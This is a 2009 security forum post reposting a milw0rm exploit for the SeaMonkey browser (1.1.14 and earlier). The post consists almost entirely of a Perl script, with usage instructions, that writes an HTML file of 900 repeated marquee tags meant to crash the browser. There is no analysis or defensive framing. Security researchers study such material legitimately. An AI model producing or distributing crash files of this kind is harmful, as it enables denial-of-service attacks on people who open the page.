|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 87
Members: 0
Total: 87
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit |
|
Posted: Thu Jan 15, 2009 10:53 pm |
|
|
yeat |
Regular user |
|
|
Joined: Jan 16, 2009 |
Posts: 8 |
Location: Italy |
|
|
|
|
|
|
Original link -> Here
Code: | #!/usr/bin/perl
# SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit
# by athos - staker[at]hotmail[dot]it
# tested on ubuntu 8.10 / slackware 12.2
# thanks to SirDark because he has tested on slackware
my $data = undef;
my $file = shift or &usage;
exploit();
sub exploit {
$data .= "<html><head><title>";
$data .= "SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit";
$data .= "</title></head><body>";
$data .= "<marquee>" x900;
$data .= "</body></html>";
open(FILE,'>',$file) or die('file error');
print FILE $data;
close(FILE);
}
sub usage {
print "\n+---------------------------------------------------------+\r".
"\n| SeaMonkey <= 1.1.14 (marquee) Denial of Service Exploit |\r".
"\n+---------------------------------------------------------+\r".
"\nby athos - staker[at]hotmail[dot]it\n".
"\nUsage\n".
"\rperl $0 [file name]\n".
"\rperl $0 crash.html\n";
exit;
}
# milw0rm.com [2009-01-06] |
|
|
|
|
|
|
www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|